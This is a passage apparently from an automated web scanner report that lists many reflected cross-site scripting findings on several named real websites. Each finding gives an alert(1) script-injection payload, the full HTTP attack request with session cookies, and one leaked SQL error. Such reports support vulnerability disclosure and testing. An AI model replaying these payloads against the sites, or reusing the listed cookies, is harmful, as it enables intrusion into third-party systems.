The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1666f"><script>alert(1)</script>c233875c8f4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /?1666f"><script>alert(1)</script>c233875c8f4=1 HTTP/1.1 Host: www.barracudanetworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.112. http://www.barracudanetworks.com/ns/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /ns/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbe9f"><script>alert(1)</script>f4cf3321ed5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/?L=en&dbe9f"><script>alert(1)</script>f4cf3321ed5=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/purchase/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.1.10.1303306562
3.113. http://www.barracudanetworks.com/ns/company/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /ns/company/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d81"><script>alert(1)</script>d58425295a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/company/?44d81"><script>alert(1)</script>d58425295a3=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/?L=en User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.2.10.1303306562
3.114. http://www.barracudanetworks.com/ns/products/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /ns/products/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d50"><script>alert(1)</script>49c5ce14246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/?89d50"><script>alert(1)</script>49c5ce14246=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/company/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.3.10.1303306562
3.115. http://www.barracudanetworks.com/ns/products/index.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /ns/products/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464b5"><script>alert(1)</script>9af30aa4e31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/index.php?464b5"><script>alert(1)</script>9af30aa4e31=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303243982.1303304004.3; __utmc=91832325; __utmb=91832325.1.10.1303304004
3.116. http://www.barracudanetworks.com/ns/products/purewire_web_security_service_overview.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cc91"><script>alert(1)</script>38b325e3a40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/purewire_web_security_service_overview.php?5cc91"><script>alert(1)</script>38b325e3a40=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; barra_hidden_menus=a%3A0%3A%7B%7D; __utma=91832325.187649019.1303169116.1303169116.1303243982.2
3.117. http://www.barracudanetworks.com/ns/products/spam_overview.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /ns/products/spam_overview.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2964"><script>alert(1)</script>027de165552 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/spam_overview.php?f2964"><script>alert(1)</script>027de165552=1 HTTP/1.1 Host: www.barracudanetworks.com Proxy-Connection: keep-alive Referer: http://www.barracudanetworks.com/ns/products/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; Barracuda_Session=o6am9tdvfifm47hp67u27vi0a1; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304208.1303306562.5; __utmc=91832325; __utmb=91832325.4.10.1303306562
3.118. http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /ns/products/web-site-firewall-overview.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a4ca"><script>alert(1)</script>921665f2e0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/web-site-firewall-overview.php?6a4ca"><script>alert(1)</script>921665f2e0e=1 HTTP/1.1
Host: www.barracudanetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
3.119. http://www.barracudanetworks.com/ns/purchase/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.barracudanetworks.com
Path: /ns/purchase/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af309"><script>alert(1)</script>c537b15be43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/purchase/?af309"><script>alert(1)</script>c537b15be43=1 HTTP/1.1
Host: www.barracudanetworks.com
Proxy-Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/web-site-firewall-overview.php?6a4ca%22%3E%3Cscript%3Ealert(0x21)%3C/script%3E921665f2e0e=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303304208.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303304004.1303304208.4; __utmc=91832325
3.120. https://www.barracudanetworks.com/ns/products/request_eval_unit.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://www.barracudanetworks.com
Path: /ns/products/request_eval_unit.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4837a"><script>alert(1)</script>92c292c0144 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /ns/products/request_eval_unit.php?products=BWB&4837a"><script>alert(1)</script>92c292c0144=1 HTTP/1.1
Host: www.barracudanetworks.com
Connection: keep-alive
Referer: http://www.barracudanetworks.com/ns/products/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=91832325.1303243982.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; locale=country_code%0Aus%0Aregion%0Aus%0Alang_code%0Aen%0Ag_geo_ip_detect%0A%FF0%FF%0A; barra_hidden_menus=a%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22web_app_firewall%22%3B%7D; __utma=91832325.187649019.1303169116.1303243982.1303304004.3; __utmc=91832325; __utmb=91832325.2.10.1303304004
Response
HTTP/1.1 200 OK
Content-Type: text/html
Date: Wed, 20 Apr 2011 12:55:39 GMT
Connection: close
3.121. http://www.bizfind.us/Index.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bizfind.us
Path: /Index.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 860e5"><script>alert(1)</script>e2c342ae66f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Index.asp??860e5"><script>alert(1)</script>e2c342ae66f=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=OAGGLIGCEHCIFDFPOAKHADBM
Accept-Encoding: gzip, deflate
3.122. http://www.bizfind.us/impressum.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bizfind.us
Path: /impressum.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2791"><script>alert(1)</script>1e614f1c6c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /impressum.asp?e2791"><script>alert(1)</script>1e614f1c6c=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate
3.123. http://www.bizfind.us/privacy.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bizfind.us
Path: /privacy.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92c7f"><script>alert(1)</script>d295bc8863c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /privacy.asp?92c7f"><script>alert(1)</script>d295bc8863c=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate
3.124. http://www.bizfind.us/pubblicita.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bizfind.us
Path: /pubblicita.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40415"><script>alert(1)</script>ca47b0c9abe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pubblicita.asp?40415"><script>alert(1)</script>ca47b0c9abe=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=OAGGLIGCEHCIFDFPOAKHADBM
Accept-Encoding: gzip, deflate
The value of the cerca request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d443e"><script>alert(1)</script>304c9412ab6 was submitted in the cerca parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.asp?cerca=searchd443e"><script>alert(1)</script>304c9412ab6&cerco=ragionesociale&cosa=&dove=&pg=1&tipo=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate
The value of the cerco request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3da6"><script>alert(1)</script>5a3ce2ded49 was submitted in the cerco parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /search.asp?cerca=search&cerco=ragionesocialee3da6"><script>alert(1)</script>5a3ce2ded49&cosa=&dove=&pg=1&tipo=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate
3.127. http://www.bizfind.us/sitemap.asp [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.bizfind.us
Path: /sitemap.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcb41"><script>alert(1)</script>38e48083f60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap.asp?bcb41"><script>alert(1)</script>38e48083f60=1 HTTP/1.1
Referer: http://www.bizfind.us/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.bizfind.us
Cookie: ASPSESSIONIDSABCCQDR=PCGGLIGCIOIEPGPAOPKKIALI
Accept-Encoding: gzip, deflate
3.128. http://www.briangardner.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.briangardner.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac42f"><script>alert(1)</script>1386c9e13ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ac42f\"><script>alert(1)</script>1386c9e13ba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?ac42f"><script>alert(1)</script>1386c9e13ba=1 HTTP/1.1
Host: www.briangardner.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 488fd"><script>alert(1)</script>c1abdd6385b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload c2ee1><script>alert(1)</script>110769be82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 56330><script>alert(1)</script>08e5f3c2de was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbb52"><script>alert(1)</script>edd60039baf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 9e098><script>alert(1)</script>990afe4d813 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc62f"><script>alert(1)</script>df827601767 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d36"><script>alert(1)</script>71b3edd8e0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82b4a"><script>alert(1)</script>5a166ca3e9b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ebed"><script>alert(1)</script>9fb83843369 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6583"><script>alert(1)</script>83968344e4f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c944c"><script>alert(1)</script>c1f9a991763 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 61f95<a>a0264480a25 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
1054: Unknown column '5265261f95' in 'where clause'<br /><br /><textarea rows="10" cols="100">SELECT image FROM image WHERE image_id = 5265261f95<a>a0264480a25</textarea> Warning: mysql_num_ ...[SNIP]...
3.141. http://www.caribbean-ocean.com/get-image.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://www.caribbean-ocean.com
Path: /get-image.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5489f<a>e321fa70c32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload fb1ab><script>alert(1)</script>d76d00b9711 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f49f4"><script>alert(1)</script>426e31d6add was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 5bcea><script>alert(1)</script>e29d7a87e54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4754c"><script>alert(1)</script>177af1120f5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload e6e76><script>alert(1)</script>0808859b3b7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 331fa"><script>alert(1)</script>5e831a0ec97 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66ea5"><script>alert(1)</script>ca4cb90b998 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 299cc"><script>alert(1)</script>2a8489d5ca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70dbc"><script>alert(1)</script>c0d8ae38156 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dba93"><script>alert(1)</script>ee22e77bfa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 184fe"><script>alert(1)</script>67eb97766fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f595"><script>alert(1)</script>67a759c718b was submitted in the REST URL parameter 4. This input was echoed as 5f595\"><script>alert(1)</script>67a759c718b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2008/07/20/managing-your-security-career5f595"><script>alert(1)</script>67a759c718b/ HTTP/1.1
Host: www.digitalbond.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68e96"><script>alert(1)</script>5199d6c8bfe was submitted in the REST URL parameter 1. This input was echoed as 68e96\"><script>alert(1)</script>5199d6c8bfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wp-content68e96"><script>alert(1)</script>5199d6c8bfe/plugins/oiopub-direct/modules/tracker/tracker.php?pids=0|8 HTTP/1.1
Host: www.digitalbond.com
Proxy-Connection: keep-alive
Referer: http://digibond.wpengine.com/wp-contente2828%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eeab5008b54d/plugins/amr-ical-events-list/css/icallist.css?ver=1
